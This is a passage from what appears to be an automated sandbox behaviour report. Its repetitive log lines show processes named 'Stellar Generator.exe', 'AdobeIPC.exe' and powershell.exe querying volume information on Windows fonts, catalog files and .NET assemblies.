Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\ProgramData\Stellar Generator.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Queries volume information: C:\ProgramData\AdobeIPC.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\AdobeIPC.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
